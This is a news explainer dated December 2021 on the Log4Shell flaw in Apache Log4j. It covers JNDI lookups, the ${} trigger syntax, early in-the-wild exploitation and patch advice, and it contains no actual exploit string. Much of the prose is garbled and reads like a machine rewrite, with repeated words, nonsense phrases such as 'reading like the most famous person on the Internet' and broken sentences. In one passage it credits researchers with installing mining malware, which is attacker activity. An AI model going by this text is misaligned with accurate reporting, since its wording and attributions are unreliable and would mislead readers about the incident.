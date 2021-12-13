



Log4Shell is the name given to a critical zero-day vulnerability that surfaced when exploited on Thursday in a remote code breach against a Minecraft server. The cause of the vulnerability was Log4J. This is a logging utility used by thousands, if not millions, of apps, including those used by almost every company on the planet. The Minecraft server was the canary of the coal mine proverb.

In the next four days, that clear Log4Shell was a serious threat in every way, as I claimed, and the list of cloud services affected reading like the most famous person on the Internet. Threat analysts and researchers have so far evaluated the damage and the outlook for the coming weeks and months. Here’s what you need to know for now:

What is Log4J? Why is Log4Shell so important? Log4J is an open source Java-based logging tool available from Apache. It has the ability to perform network lookups using the Java Naming and Directory Interface and get services from the lightweight directory access protocol. The end result: Log4j interprets the log message as a URL, retrieves it, retrieves it, and executes the executable payload contained with the full privileges of the main program. Exploits are triggered in text using the $ {} syntax and can be included in browser user agents or other commonly logged attributes.

As Juniper Networks researchers have shown, the exploit looks like this:

Juniper Networks

Tracked as CVE-2021-44228, this vulnerability has a severity rating of 10 out of 10. Zero-day attacks were exploited at least nine days before they surfaced.

The earliest evidence ever found for the # Log4J exploit is 2021-12-01 04:36:50 UTC. It suggests that it was in the wild at least 9 days before it was publicly disclosed. However, there is no evidence of mass exploitation until it is published.

Matthew Prince (@eastdakota) December 11, 2021

Researchers on Cisco’s Talos security team said they had observed the exploit since December 2.

What has happened since Log4Shell first appeared last Thursday? Almost immediately, security company Gray Noise detected an active scan trying to identify a vulnerable server. Researchers have used this critically exploitable vulnerability to install cryptographic mining malware, enhance Linux botnets, configure from vulnerable servers, steal environment variables, and other potentially sensitive data. It reports that it has been confirmed.

How is the prognosis? In the best scenario, major brokers, banks, and merchants invest huge amounts of overtime to pay a large number of already overworked IT employees to clear this turmoil during the holidays. .. Worst, except remembering the 2017 Equifax breach and the 143 million U.S. consumer data breaches that followed when the company was unable to patch for a similarly catastrophic vulnerability. I don’t want to think about the scenario.

It’s bad. what should I do? That’s right. As an end user, there’s not much you can do other than track the services you use and ask what they’re doing to keep the data you outsource to them safe. The most convenient thing a cloud service can do is update Log4J. But for large companies, it’s often not that simple. Dozens of security companies publish guidance. Here and here is some advice from Microsoft and Sophos.

